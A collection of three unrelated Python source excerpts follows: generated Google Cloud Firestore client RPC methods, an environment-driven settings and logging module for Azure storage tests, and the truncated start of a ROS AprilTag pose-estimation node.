# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, FirestoreTransport):
# transport is a FirestoreTransport instance.
if credentials or client_options.credentials_file:
raise ValueError(
"When providing a transport instance, "
"provide its credentials directly."
)
if client_options.scopes:
raise ValueError(
"When providing a transport instance, provide its scopes "
"directly."
)
self._transport = transport
else:
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials,
credentials_file=client_options.credentials_file,
host=api_endpoint,
scopes=client_options.scopes,
client_cert_source_for_mtls=client_cert_source_func,
quota_project_id=client_options.quota_project_id,
client_info=client_info,
always_use_jwt_access=(
Transport == type(self).get_transport_class("grpc")
or Transport == type(self).get_transport_class("grpc_asyncio")
),
)
def get_document(
self,
request: firestore.GetDocumentRequest = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> document.Document:
r"""Gets a single document.
Args:
request (google.cloud.firestore_v1.types.GetDocumentRequest):
The request object. The request for
[Firestore.GetDocument][google.firestore.v1.Firestore.GetDocument].
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.firestore_v1.types.Document:
A Firestore document.
Must not exceed 1 MiB - 4 bytes.
"""
# Create or coerce a protobuf request object.
# Minor optimization to avoid making a copy if the user passes
# in a firestore.GetDocumentRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.GetDocumentRequest):
request = firestore.GetDocumentRequest(request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_document]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def list_documents(
self,
request: firestore.ListDocumentsRequest = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListDocumentsPager:
r"""Lists documents.
Args:
request (google.cloud.firestore_v1.types.ListDocumentsRequest):
The request object. The request for
[Firestore.ListDocuments][google.firestore.v1.Firestore.ListDocuments].
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.firestore_v1.services.firestore.pagers.ListDocumentsPager:
The response for
[Firestore.ListDocuments][google.firestore.v1.Firestore.ListDocuments].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Minor optimization to avoid making a copy if the user passes
# in a firestore.ListDocumentsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.ListDocumentsRequest):
request = firestore.ListDocumentsRequest(request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_documents]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListDocumentsPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
def update_document(
self,
request: firestore.UpdateDocumentRequest = None,
*,
document: gf_document.Document = None,
update_mask: common.DocumentMask = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> gf_document.Document:
r"""Updates or inserts a document.
Args:
request (google.cloud.firestore_v1.types.UpdateDocumentRequest):
The request object. The request for
[Firestore.UpdateDocument][google.firestore.v1.Firestore.UpdateDocument].
document (google.cloud.firestore_v1.types.Document):
Required. The updated document.
Creates the document if it does not
already exist.
This corresponds to the ``document`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.cloud.firestore_v1.types.DocumentMask):
The fields to update.
None of the field paths in the mask may
contain a reserved name.
If the document exists on the server and
has fields not referenced in the mask,
they are left unchanged.
Fields referenced in the mask, but not
present in the input document, are
deleted from the document on the server.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.firestore_v1.types.Document:
A Firestore document.
Must not exceed 1 MiB - 4 bytes.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([document, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a firestore.UpdateDocumentRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.UpdateDocumentRequest):
request = firestore.UpdateDocumentRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if document is not None:
request.document = document
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.update_document]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("document.name", request.document.name),)
),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def delete_document(
self,
request: firestore.DeleteDocumentRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Deletes a document.
Args:
request (google.cloud.firestore_v1.types.DeleteDocumentRequest):
The request object. The request for
[Firestore.DeleteDocument][google.firestore.v1.Firestore.DeleteDocument].
name (str):
Required. The resource name of the Document to delete.
In the format:
``projects/{project_id}/databases/{database_id}/documents/{document_path}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a firestore.DeleteDocumentRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.DeleteDocumentRequest):
request = firestore.DeleteDocumentRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete_document]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
rpc(
request, retry=retry, timeout=timeout, metadata=metadata,
)
def batch_get_documents(
self,
request: firestore.BatchGetDocumentsRequest = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> Iterable[firestore.BatchGetDocumentsResponse]:
r"""Gets multiple documents.
Documents returned by this method are not guaranteed to
be returned in the same order that they were requested.
Args:
request (google.cloud.firestore_v1.types.BatchGetDocumentsRequest):
The request object. The request for
[Firestore.BatchGetDocuments][google.firestore.v1.Firestore.BatchGetDocuments].
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
Iterable[google.cloud.firestore_v1.types.BatchGetDocumentsResponse]:
The streamed response for
[Firestore.BatchGetDocuments][google.firestore.v1.Firestore.BatchGetDocuments].
"""
# Create or coerce a protobuf request object.
# Minor optimization to avoid making a copy if the user passes
# in a firestore.BatchGetDocumentsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.BatchGetDocumentsRequest):
request = firestore.BatchGetDocumentsRequest(request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.batch_get_documents]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("database", request.database),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def begin_transaction(
self,
request: firestore.BeginTransactionRequest = None,
*,
database: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> firestore.BeginTransactionResponse:
r"""Starts a new transaction.
Args:
request (google.cloud.firestore_v1.types.BeginTransactionRequest):
The request object. The request for
[Firestore.BeginTransaction][google.firestore.v1.Firestore.BeginTransaction].
database (str):
Required. The database name. In the format:
``projects/{project_id}/databases/{database_id}``.
This corresponds to the ``database`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.firestore_v1.types.BeginTransactionResponse:
The response for
[Firestore.BeginTransaction][google.firestore.v1.Firestore.BeginTransaction].
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([database])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a firestore.BeginTransactionRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.BeginTransactionRequest):
request = firestore.BeginTransactionRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if database is not None:
request.database = database
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.begin_transaction]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("database", request.database),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def commit(
self,
request: firestore.CommitRequest = None,
*,
database: str = None,
writes: Sequence[gf_write.Write] = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> firestore.CommitResponse:
r"""Commits a transaction, while optionally updating
documents.
Args:
request (google.cloud.firestore_v1.types.CommitRequest):
The request object. The request for
[Firestore.Commit][google.firestore.v1.Firestore.Commit].
database (str):
Required. The database name. In the format:
``projects/{project_id}/databases/{database_id}``.
This corresponds to the ``database`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
writes (Sequence[google.cloud.firestore_v1.types.Write]):
The writes to apply.
Always executed atomically and in order.
This corresponds to the ``writes`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.firestore_v1.types.CommitResponse:
The response for
[Firestore.Commit][google.firestore.v1.Firestore.Commit].
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([database, writes])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a firestore.CommitRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.CommitRequest):
request = firestore.CommitRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if database is not None:
request.database = database
if writes is not None:
request.writes = writes
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.commit]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("database", request.database),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def rollback(
self,
request: firestore.RollbackRequest = None,
*,
database: str = None,
transaction: bytes = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Rolls back a transaction.
Args:
request (google.cloud.firestore_v1.types.RollbackRequest):
The request object. The request for
[Firestore.Rollback][google.firestore.v1.Firestore.Rollback].
database (str):
Required. The database name. In the format:
``projects/{project_id}/databases/{database_id}``.
This corresponds to the ``database`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
transaction (bytes):
Required. The transaction to roll
back.
This corresponds to the ``transaction`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([database, transaction])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a firestore.RollbackRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.RollbackRequest):
request = firestore.RollbackRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if database is not None:
request.database = database
if transaction is not None:
request.transaction = transaction
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.rollback]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("database", request.database),)),
)
# Send the request.
rpc(
request, retry=retry, timeout=timeout, metadata=metadata,
)
def run_query(
self,
request: firestore.RunQueryRequest = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> Iterable[firestore.RunQueryResponse]:
r"""Runs a query.
Args:
request (google.cloud.firestore_v1.types.RunQueryRequest):
The request object. The request for
[Firestore.RunQuery][google.firestore.v1.Firestore.RunQuery].
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
Iterable[google.cloud.firestore_v1.types.RunQueryResponse]:
The response for
[Firestore.RunQuery][google.firestore.v1.Firestore.RunQuery].
"""
# Create or coerce a protobuf request object.
# Minor optimization to avoid making a copy if the user passes
# in a firestore.RunQueryRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.RunQueryRequest):
request = firestore.RunQueryRequest(request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.run_query]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def partition_query(
self,
request: firestore.PartitionQueryRequest = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.PartitionQueryPager:
r"""Partitions a query by returning partition cursors
that can be used to run the query in parallel. The
returned partition cursors are split points that can be
used by RunQuery as starting/end points for the query
results.
Args:
request (google.cloud.firestore_v1.types.PartitionQueryRequest):
The request object. The request for
[Firestore.PartitionQuery][google.firestore.v1.Firestore.PartitionQuery].
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.firestore_v1.services.firestore.pagers.PartitionQueryPager:
The response for
[Firestore.PartitionQuery][google.firestore.v1.Firestore.PartitionQuery].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Minor optimization to avoid making a copy if the user passes
# in a firestore.PartitionQueryRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.PartitionQueryRequest):
request = firestore.PartitionQueryRequest(request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.partition_query]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.PartitionQueryPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
def write(
self,
requests: Iterator[firestore.WriteRequest] = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> Iterable[firestore.WriteResponse]:
r"""Streams batches of document updates and deletes, in
order.
Args:
requests (Iterator[google.cloud.firestore_v1.types.WriteRequest]):
The request object iterator. The request for
[Firestore.Write][google.firestore.v1.Firestore.Write].
The first request creates a stream, or resumes an
existing one from a token.
When creating a new stream, the server replies with a
response containing only an ID and a token, to use in
the next request.
When resuming a stream, the server first streams any
responses later than the given token, then a response
containing only an up-to-date token, to use in the next
request.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
Iterable[google.cloud.firestore_v1.types.WriteResponse]:
The response for
[Firestore.Write][google.firestore.v1.Firestore.Write].
"""
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.write]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (gapic_v1.routing_header.to_grpc_metadata(()),)
# Send the request.
response = rpc(requests, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def listen(
self,
requests: Iterator[firestore.ListenRequest] = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> Iterable[firestore.ListenResponse]:
r"""Listens to changes.
Args:
requests (Iterator[google.cloud.firestore_v1.types.ListenRequest]):
The request object iterator. A request for
[Firestore.Listen][google.firestore.v1.Firestore.Listen]
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
Iterable[google.cloud.firestore_v1.types.ListenResponse]:
The response for
[Firestore.Listen][google.firestore.v1.Firestore.Listen].
"""
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.listen]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (gapic_v1.routing_header.to_grpc_metadata(()),)
# Send the request.
response = rpc(requests, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def list_collection_ids(
self,
request: firestore.ListCollectionIdsRequest = None,
*,
parent: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListCollectionIdsPager:
r"""Lists all the collection IDs underneath a document.
Args:
request (google.cloud.firestore_v1.types.ListCollectionIdsRequest):
The request object. The request for
[Firestore.ListCollectionIds][google.firestore.v1.Firestore.ListCollectionIds].
parent (str):
Required. The parent document. In the format:
``projects/{project_id}/databases/{database_id}/documents/{document_path}``.
For example:
``projects/my-project/databases/my-database/documents/chatrooms/my-chatroom``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.firestore_v1.services.firestore.pagers.ListCollectionIdsPager:
The response from
[Firestore.ListCollectionIds][google.firestore.v1.Firestore.ListCollectionIds].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a firestore.ListCollectionIdsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.ListCollectionIdsRequest):
request = firestore.ListCollectionIdsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_collection_ids]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListCollectionIdsPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
def batch_write(
self,
request: firestore.BatchWriteRequest = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> firestore.BatchWriteResponse:
r"""Applies a batch of write operations.
The BatchWrite method does not apply the write operations
atomically and can apply them out of order. Method does not
allow more than one write per document. Each write succeeds or
fails independently. See the
[BatchWriteResponse][google.firestore.v1.BatchWriteResponse] for
the success status of each write.
If you require an atomically applied set of writes, use
[Commit][google.firestore.v1.Firestore.Commit] instead.
Args:
request (google.cloud.firestore_v1.types.BatchWriteRequest):
The request object. The request for
[Firestore.BatchWrite][google.firestore.v1.Firestore.BatchWrite].
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.firestore_v1.types.BatchWriteResponse:
The response from
[Firestore.BatchWrite][google.firestore.v1.Firestore.BatchWrite].
"""
# Create or coerce a protobuf request object.
# Minor optimization to avoid making a copy if the user passes
# in a firestore.BatchWriteRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.BatchWriteRequest):
request = firestore.BatchWriteRequest(request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.batch_write]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("database", request.database),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def create_document(
self,
request: firestore.CreateDocumentRequest = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> document.Document:
r"""Creates a new document.
Args:
request (google.cloud.firestore_v1.types.CreateDocumentRequest):
The request object. The request for
[Firestore.CreateDocument][google.firestore.v1.Firestore.CreateDocument].
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.firestore_v1.types.Document:
A Firestore document.
Must not exceed 1 MiB - 4 bytes.
"""
# Create or coerce a protobuf request object.
# Minor optimization to avoid making a copy if the user passes
# in a firestore.CreateDocumentRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.CreateDocumentRequest):
request = firestore.CreateDocumentRequest(request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.create_document]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution("google-cloud-firestore",).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = ("FirestoreClient",)
|
the-stack_0_25982
|
import pytz
import os
import logging.config
from dotenv import load_dotenv
from ..utils import env
from datetime import datetime
HOME_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
dot_env = os.path.join(HOME_DIR, ".env")
load_dotenv(dotenv_path=dot_env)
DEBUG = env("DEBUG",False)
TIME_ZONE = env("TIME_ZONE",'Australia/Perth')
TZ = datetime.now(tz=pytz.timezone(TIME_ZONE)).tzinfo
AZURE_CONNECTION_STRING = env("TEST_STORAGE_CONNECTION_STRING",vtype=str,required=True)
AZURE_CONTAINER = env("TEST_CONTAINER",vtype=str,required=True)
RESOURCE_NAME = env("TEST_RESOURCE_NAME",vtype=str,required=True)
LOCAL_STORAGE_ROOT_FOLDER = env("TEST_STORAGE_ROOT_FOLDER",vtype=str,required=True)
logging.basicConfig(level="WARNING")
LOG_CONFIG = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
#'console': {'format': '%(asctime)s %(levelname)-8s %(name)-15s %(message)s'},
'console': {'format': '%(asctime)s %(levelname)-8s %(message)s'},
},
'handlers': {
'console': {
'level': 'DEBUG' if DEBUG else 'INFO',
'class': 'logging.StreamHandler',
'formatter': 'console'
},
},
'loggers': {
'data_storage': {
'handlers': ['console'],
'level': 'DEBUG' if DEBUG else 'INFO',
'propagate':False
},
},
'root':{
'handlers': ['console'],
'level': 'WARNING',
'propagate':False
}
}
logging.config.dictConfig(LOG_CONFIG)
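# A hypothetical .env illustrating the variables read above (placeholder values only,
# not part of this module):
#
#   DEBUG=True
#   TIME_ZONE=Australia/Perth
#   TEST_STORAGE_CONNECTION_STRING=DefaultEndpointsProtocol=https;AccountName=...;AccountKey=...
#   TEST_CONTAINER=my-test-container
#   TEST_RESOURCE_NAME=my-resource
#   TEST_STORAGE_ROOT_FOLDER=/tmp/storage-root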
|
the-stack_0_25985
|
__author__ = 'patras'
from domain_exploreEnv import *
from timer import DURATION
from state import state, rv
DURATION.TIME = {
'survey': 5,
'monitor': 5,
'screen': 5,
'sample': 5,
'process': 5,
'fly': 3,
'deposit': 1,
'transferData': 1,
'take': 2,
'put': 2,
'move': 10,
'charge': 5,
'negotiate': 5,
'handleAlien': 5,
}
DURATION.COUNTER = {
'survey': 5,
'monitor': 5,
'screen': 5,
'sample': 5,
'process': 5,
'fly': 3,
'deposit': 1,
'transferData': 1,
'take': 2,
'put': 2,
'move': 10,
'charge': 5,
'negotiate': 5,
'handleAlien': 5,
}
rv.TYPE = {'e1': 'survey', 'e2': 'monitor', 'e3': 'screen', 'e4': 'sample', 'e5':'process'}
rv.EQUIPMENT = {'survey': 'e1', 'monitor': 'e2', 'screen': 'e3', 'sample': 'e4', 'process': 'e5'}
rv.EQUIPMENTTYPE = {'e1': 'survey', 'e2': 'monitor', 'e3': 'screen', 'e4': 'sample', 'e5':'process'}
rv.LOCATIONS = ['base', 'z1', 'z2', 'z3', 'z4']
rv.EDGES = {'base': {'z1': 20, 'z2': 50, 'z3': 20, 'z4': 50}, 'z1': {'base': 20, 'z2': 30, 'z4': 50}, 'z2': {'base': 50, 'z1': 30, 'z3': 30}, 'z3': {'base': 20, 'z2': 30, 'z4': 30}, 'z4': {'base': 50, 'z3': 30, 'z1': 50}}
def ResetState():
state.loc = {'r1': 'base', 'r2': 'base', 'UAV': 'base'}
state.charge = { 'UAV': 50, 'r1': 80, 'r2': 50}
state.data = { 'UAV': 1, 'r1': 3, 'r2': 3}
state.pos = {'c1': 'base', 'e1': 'base', 'e2': 'base', 'e3': 'base', 'e4': 'base', 'e5': 'base'}
state.load = {'r1': NIL, 'r2': NIL, 'UAV': NIL}
state.storm = {'active': True}
tasks = {
2: [['doActivities', 'UAV', [['survey', 'z4'], ['survey', 'base'], ['survey', 'z1']]]],
4: [['handleEmergency', 'r2', 'z2']],
}
eventsEnv = {
4: [alienSpotted, ['z2']]
}
|
the-stack_0_25986
|
#!/usr/bin/env python
import rospy
import numpy
from apriltag_ros.msg import AprilTagDetectionArray
from geometry_msgs.msg import PoseWithCovarianceStamped
import tf
rospy.init_node('yeetbot_absolute_pose_estimation')
tf_listener = tf.TransformListener()
def tag_detection_cb(tag_array):
global pub
# Transform from the map frame to the camera frame
try:
(cam_trans, cam_rot) = tf_listener.lookupTransform(
'map', tag_array.header.frame_id, rospy.Time(0))
except (tf.LookupException, tf.ConnectivityException,
tf.ExtrapolationException):
